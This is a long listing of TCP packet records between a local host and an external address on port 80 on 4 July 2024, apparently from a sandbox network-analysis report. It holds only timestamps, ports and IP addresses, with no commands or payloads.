Jul 4, 2024 03:12:30.553746939 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.553797007 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.554661036 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.554667950 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.554677963 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.554691076 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.554696083 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.554706097 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.554768085 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.554768085 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.555625916 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.555633068 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.555636883 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.555644035 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.555648088 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.555654049 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.555710077 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.555710077 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.556590080 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.556596041 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.556607962 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.556617975 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.556622982 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.556633949 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.556652069 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.556674004 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.557550907 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.557558060 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.557568073 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.557573080 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.557576895 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.557635069 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.557635069 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.563492060 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.563590050 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.594981909 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.595120907 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.595128059 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.595161915 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.595181942 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.595431089 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.595437050 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.595443010 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.595448017 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.595452070 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.595499039 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.595499039 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.625876904 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.625988960 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.625993967 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.626050949 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.626293898 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.626399040 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.626409054 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.626415014 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.626418114 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.626425028 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.626471996 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.626471996 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.626908064 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.626914024 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.626924992 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.626930952 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.626935959 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.626967907 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.627027035 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.627672911 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.627677917 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.627688885 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.627737999 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.627737999 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.628143072 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.628149033 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.628154993 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.628165960 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.628171921 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.628176928 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.628196001 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.628246069 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.629060030 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.629157066 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.629189968 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.629199028 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.629281044 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.629446030 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.629487991 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.629493952 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.629498959 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.629549980 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.629549980 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.635482073 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.635628939 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.635633945 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.635704041 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.635871887 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.635973930 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.636015892 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.636020899 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.636033058 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.636039019 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.636066914 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.636090994 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.636689901 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.636694908 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.636706114 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.636712074 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.636718035 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.636764050 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.636842966 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.637527943 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.637533903 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.637546062 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.637550116 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.637559891 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.637569904 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.637584925 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.637645960 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.638221025 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.638226032 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.638237000 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.638242006 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.638251066 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.638276100 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.638339043 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.638953924 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.638958931 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.638969898 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.638976097 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.638981104 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.639033079 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.639033079 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.639075041 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.639843941 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.639849901 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.639861107 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.639866114 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.639870882 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.639874935 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.639925003 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.639925003 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.640719891 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.640726089 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.640734911 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.640739918 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.640754938 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.640760899 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.640791893 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.640791893 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.640840054 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.641541004 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.641546965 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.641556025 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.641561031 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.641566038 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.641576052 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.641582012 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.641591072 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.641621113 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.641621113 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.642368078 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.642433882 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.642438889 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.642447948 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.642453909 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.642462015 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.642466068 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.642471075 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.642517090 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.642517090 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.643110037 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.643115997 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.643126965 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.643132925 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.643136978 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.643141985 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.643146992 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.643151999 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.643181086 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.643347979 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.644177914 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.644184113 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.644193888 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.644200087 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.644205093 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.644210100 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.644213915 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.644220114 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.644228935 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.644233942 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.644284010 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.644284010 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.645039082 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.645045042 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.645056963 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.645061970 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.645071983 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.645076990 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.645081997 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.645108938 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.645140886 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.645140886 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.645190001 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.685142040 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.685249090 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.685314894 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.685319901 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.685440063 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.685445070 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.685452938 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.685513973 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.685688972 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.685724020 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.685728073 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.685844898 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.716034889 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.716039896 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.716046095 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.716139078 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.716286898 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.716381073 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.716434002 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.716434002 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.716533899 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.716540098 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.716552019 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.716613054 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.717060089 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.717065096 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.717076063 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.717082024 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.717086077 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.717097998 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.717116117 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.717135906 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.717135906 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.718009949 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.718014956 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.718019009 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.718028069 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.718033075 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.718036890 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.718043089 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.718046904 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.718064070 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.718064070 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.718123913 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.719094992 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.719188929 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.719198942 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.719254017 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.719254017 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.719444990 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.719567060 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.719572067 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.719575882 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.719577074 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.719580889 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.719610929 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.719656944 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.725378990 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.725485086 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.725490093 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.725575924 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.725773096 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.725779057 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.725903034 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.726016998 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.726022959 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
                  Jul 4, 2024 03:12:30.726094961 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.726279974 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.726350069 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.726355076 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.726358891 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.726363897 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.726368904 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.726398945 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.726464033 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.727066994 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.727072001 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.727145910 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.727302074 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.727307081 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.727312088 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.727317095 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.727328062 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.727350950 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.727389097 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.727389097 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.728010893 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.728024006 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.728034973 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.728039980 CEST8049754185.234.72.101192.168.2.4
